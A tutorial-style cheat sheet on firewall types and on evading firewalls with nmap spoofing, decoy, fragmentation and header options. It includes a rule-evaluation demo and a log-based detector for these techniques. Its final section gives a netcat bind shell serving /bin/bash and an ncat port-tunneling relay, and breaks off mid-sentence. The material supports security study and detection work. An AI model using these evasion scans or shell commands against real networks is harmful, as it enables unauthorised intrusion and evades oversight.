# Firewall Handling and Bypassing
## Types

* Packet filtering
* Circuit level gateway
* Stateful inspection
* Proxy
* Next generation firewall
* Cloud firewall and FWaaS

## Rules
* Firewalls evaluate an ordered rule set with a default policy for anything that matches no rule; each example below adds one rule that allows inbound TCP traffic to port 57869.
### Windows
```sh
REM allow inbound TCP 57869 on every profile; "muka" is only the rule's display name
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
netsh advfirewall firewall show rule name="muka"
```
### Linux
```sh
# runtime only; repeat with --permanent and run `firewall-cmd --reload` to keep it across reboots
firewall-cmd --zone=public --add-port=57869/tcp
firewall-cmd --zone=public --list-ports   # verify
```
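
As an added example that is not part of the original page, the following shell script simulates how such a rule set is evaluated: rules are walked top to bottom, the first match decides, and a final catch-all `DROP` is the default policy. The two rule sets and the three sample packets are constructed for this example. It also shows, ahead of the bypass section, why a stateless filter that trusts source port 443 accepts a probe aimed at port 22, while a stateful filter that keys on connection state drops the same packet.

```shell
#!/bin/sh
# Added example (not from the original page): a first-match rule evaluator that
# mimics how a packet filter walks an ordered rule set.
# Rule format (one per line, first match wins, "*" matches anything):
#   <ACTION> <proto> <sport> <dport> <state>
# Both rule sets below are constructed for this example.

# Stateless filter: it cannot tell a reply from a fresh probe, so it lets
# "replies" back in by trusting source port 443.
RULES_STATELESS='ACCEPT tcp * 443 *
ACCEPT tcp 443 * *
DROP * * * *'

# Stateful filter: new connections only to 443; anything else has to belong
# to a connection the tracker already knows (state ESTABLISHED).
RULES_STATEFUL='ACCEPT tcp * 443 NEW
ACCEPT * * * ESTABLISHED
DROP * * * *'

# evaluate <ruleset> <proto> <sport> <dport> <state>: prints the first matching action
evaluate() {
  printf '%s\n' "$1" | awk -v proto="$2" -v sport="$3" -v dport="$4" -v state="$5" '
    function m(pat, val) { return pat == "*" || pat == val }
    NF == 5 && m($2, proto) && m($3, sport) && m($4, dport) && m($5, state) { print $1; exit }
  '
}

# Constructed packets: a client hitting the web server, the server's reply to
# that client, and an nmap probe sent with --source-port 443 against SSH.
demo() {
  printf '%-30s %-10s %s\n' "packet (proto sport dport state)" "stateless" "stateful"
  for pkt in "tcp 51234 443 NEW" "tcp 443 51234 ESTABLISHED" "tcp 443 22 NEW"; do
    set -- $pkt
    printf '%-30s %-10s %s\n' "$pkt" "$(evaluate "$RULES_STATELESS" "$@")" "$(evaluate "$RULES_STATEFUL" "$@")"
  done
}

demo
```

The third row is the `--source-port 443` case from the bypass section: the stateless set accepts it on its second rule, the stateful set falls through to `DROP` because the packet is `NEW` and not aimed at 443.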
## Bypassing Firewalls

* IP/MAC/Port spoofing
* Fragmentation, MTU, data length
* Header modification

### nmap
* nmap ships several options for getting probes past the firewall in front of the target; the following subsections go through them. Everything that rewrites raw packets (spoofing, fragmentation, header fields) needs root, hence the `sudo`.
#### Spoofing
* __Decoy__ `-D`, mix the real source address with decoy addresses: every probe is sent once from each listed address (`ME` marks the real one, `RND` a random one), so the target's logs show several scanners and cannot tell which is real. Decoy hosts should be up, otherwise the target is effectively SYN-flooded from addresses that never reset.
```sh
# two fixed decoys plus the real address (ME); placing ME late keeps it from being the first source seen
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
# two random decoys; RND:5 would generate five
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
```
* __Proxy__, `--proxies` relays connections through a chain of HTTP or SOCKS4 proxies given as URLs. Per the nmap manual this lives in the nsock library, so only version detection and NSE scripts go through the proxy; host discovery, the port scan itself and OS detection still leave from the real address.
```sh
# proxies are URLs (http://host:port or socks4://host:port); $PROXY_PORT is a placeholder like $PROXY_IP
sudo nmap -Pn -sV -F --proxies http://$PROXY_IP:$PROXY_PORT $TARGET_IP
```
* __Spoofed MAC__, `--spoof-mac` takes a full MAC address, a vendor prefix or vendor name, or `0` for a random address. It only rewrites the Ethernet frame, so it matters only against filters on the same layer-2 segment (MAC allow lists) and only for raw-packet scans.
```sh
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP   # explicit MAC, or a vendor prefix/name
sudo nmap -Pn -F --spoof-mac 0 $TARGET_IP              # random MAC
```
* __Spoofed IP__, `-S` sets the source address of every probe. Replies go to that address, not to the scanner, so the results are only usable if you can sniff them (e.g. spoofing an idle neighbour on your own segment) or if the goal is merely to make the firewall see traffic from a trusted address. nmap needs `-e` to pick the interface and `-Pn` because host discovery cannot get answers.
```sh
# replies go to $SPOOFED_IP; -e names the interface since nmap cannot derive it from a foreign source address
sudo nmap -Pn -F -e $IFACE -S $SPOOFED_IP $TARGET_IP
```
* __Port Number__, `--source-port` (short form `-g`), send the probes from a source port the filter trusts; 53 (DNS), 80 and 443 are the usual picks. This only beats stateless rules that allow traffic by source port, not a stateful filter that tracks connections.
```sh
sudo nmap -Pn -F --source-port 443 $TARGET_IP   # -g 443 is equivalent; 53 is the other common choice
```
* __Fragmentation__, `-f` splits each probe into IP fragments carrying 8 bytes of transport data each (the IP header is repeated in every fragment; only the TCP/UDP header and payload are split), so a filter that inspects just the first fragment never sees a complete TCP header; `-ff` uses 16-byte fragments. Only raw-packet scans can be fragmented, and a scanning host whose own stack reassembles outgoing packets (Linux with iptables connection tracking loaded) will undo it before transmission.
```sh
sudo nmap -Pn -F -f $TARGET_IP    # 8-byte fragments
sudo nmap -Pn -F -ff $TARGET_IP   # 16-byte fragments
```
* __MTU__, `--mtu` sets the fragment size explicitly and must be a multiple of 8; `-f` is the same as `--mtu 8`, `-ff` the same as `--mtu 16`.
```sh
sudo nmap -Pn -F --mtu 8 $TARGET_IP   # value must be a multiple of 8
```
* __Data length__, `--data-length` appends the given number of random bytes to every probe. nmap's default probes carry no payload, which makes them easy to fingerprint; padding them looks more like real traffic at the cost of a slower scan.
```sh
sudo nmap -Pn -F --data-length 64 $TARGET_IP   # 64 random payload bytes per probe
```
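
Added example, not from the original page: the defender's view of the options above. The script runs awk over netfilter `LOG` lines and flags SYNs arriving from a trusted source port (`--source-port`), transport headers split across IP fragments (`-f`/`--mtu`), and several sources hitting one destination within the same second (`-D`). The log lines are constructed for this example in the layout the kernel's LOG target produces; the `FW-IN:` prefix, the addresses, the trusted-port list and the three-source threshold are all assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): spot nmap firewall-evasion options
# in netfilter LOG output. SAMPLE_LOG is constructed, not a real capture.
SAMPLE_LOG='Jan 12 10:00:01 gw kernel: FW-IN: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TTL=64 ID=101 PROTO=TCP SPT=443 DPT=22 WINDOW=1024 SYN
Jan 12 10:00:01 gw kernel: FW-IN: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TTL=64 ID=102 PROTO=TCP SPT=443 DPT=3306 WINDOW=1024 SYN
Jan 12 10:00:02 gw kernel: FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=28 TTL=64 ID=777 MF PROTO=TCP INCOMPLETE [8 bytes]
Jan 12 10:00:02 gw kernel: FW-IN: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=36 TTL=64 ID=777 FRAG:1 PROTO=TCP
Jan 12 10:00:05 gw kernel: FW-IN: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=44 TTL=52 ID=201 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 SYN
Jan 12 10:00:05 gw kernel: FW-IN: IN=eth0 OUT= SRC=203.0.113.10 DST=192.0.2.10 LEN=44 TTL=52 ID=202 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 SYN
Jan 12 10:00:05 gw kernel: FW-IN: IN=eth0 OUT= SRC=203.0.113.11 DST=192.0.2.10 LEN=44 TTL=52 ID=203 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 SYN
Jan 12 10:00:07 gw kernel: FW-IN: IN=eth0 OUT= SRC=203.0.113.20 DST=192.0.2.10 LEN=60 TTL=64 ID=301 PROTO=TCP SPT=51234 DPT=443 WINDOW=65535 SYN'

# detect_evasion: reads LOG lines on stdin, prints one "<kind> <details>" line per finding
detect_evasion() {
  awk '
    {
      split("", f)                                   # key=value fields of this line
      for (i = 1; i <= NF; i++) if (split($i, kv, "=") == 2) f[kv[1]] = kv[2]
      ts = $3; syn = ($0 ~ / SYN/)
      # 1. new connection (SYN) from a source port a stateless filter tends to trust
      if (syn && (f["SPT"] == 53 || f["SPT"] == 80 || f["SPT"] == 443) && f["SPT"] != f["DPT"])
        print "source-port-abuse", ts, f["SRC"], "SPT=" f["SPT"], "DPT=" f["DPT"]
      # 2. fragments: MF is set on the first piece, FRAG:<offset> marks the rest
      if ($0 ~ / MF / || $0 ~ / FRAG:/)
        print "fragment", ts, f["SRC"], "ID=" f["ID"]
      # 3. distinct SYN sources per (second, destination); decoys arrive together
      if (syn && !((ts SUBSEP f["DST"] SUBSEP f["SRC"]) in seen)) {
        seen[ts SUBSEP f["DST"] SUBSEP f["SRC"]] = 1
        n[ts SUBSEP f["DST"]]++
      }
    }
    END {
      for (k in n) if (n[k] >= 3) { split(k, p, SUBSEP); print "possible-decoys", p[1], p[2], n[k] " sources" }
    }
  '
}

# count_findings <kind>: number of findings of one kind in the constructed sample
count_findings() {
  printf '%s\n' "$SAMPLE_LOG" | detect_evasion | awk -v k="$1" '$1 == k { c++ } END { print c + 0 }'
}

printf '%s\n' "$SAMPLE_LOG" | detect_evasion
```

The last sample line is an ordinary client connecting to 443 and produces nothing; the other seven yield two source-port findings, two fragment findings and one decoy finding. `--badsum` probes leave no trace here, since the LOG target does not record why the receiving stack dropped a packet.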
#### Header Fields
* __TTL__, `--ttl` sets the IP time-to-live of outgoing probes, e.g. to the default of a given OS (64 for Linux, 128 for Windows) instead of the random value nmap picks by default, so the probes blend in with the host's normal traffic.
```sh
sudo nmap -Pn -F --ttl 64 $TARGET_IP   # 64 matches a Linux sender, 128 a Windows one
```
* __IP OPTIONS__, `--ip-options` takes the option bytes either as a hex string or via the shortcuts below (raw-packet scans only). Most routers and filters drop packets that carry IP options, so this mostly tests how the filter in front of the target handles them.

  * Record route, `R`
  * Timestamp, `T`
  * Record route + timestamp, `U`
  * Loose source routing, `L $IP $IP $IP`
  * Strict source routing, `S $IP $IP $IP`

* __Checksum__, `--badsum` sends probes with a deliberately wrong TCP/UDP/SCTP checksum. A real host's stack silently drops them, so any answer comes from a firewall or IDS that replied without validating the checksum; this reveals the middlebox rather than bypassing it.
```sh
sudo nmap -Pn -F --badsum $TARGET_IP   # any reply came from something other than the host's own stack
```
#### Post FW
Once past the firewall, the next step is a foothold. One option is a bind shell on a port that inbound rule sets usually leave open, such as 443 or 80, so that connecting back in does not depend on a new rule.
* __Hopping__, on a host that is already reachable past the firewall, listen with netcat on one of those allowed ports and catch the connection there

* __Tunneling__, run a relay on that host which accepts connections on the allowed port and forwards them to a port the firewall blocks (here SMTP on port 25 of an internal target)
```sh
# on the host behind the firewall: accept on 443 (allowed inbound) and relay each
# connection to port 25 of the internal target. --sh-exec is an ncat option, not classic nc.
ncat -lvn 443 --sh-exec "ncat $TARGET_IP 25"
```
* __Non standard ports__, open a bind shell on a high port the rule set does not cover via
```sh
# bind shell on 8888; -e requires ncat or nc.traditional (OpenBSD netcat has no -e)
nc -lvnp 8888 -e /bin/bash
```
and connect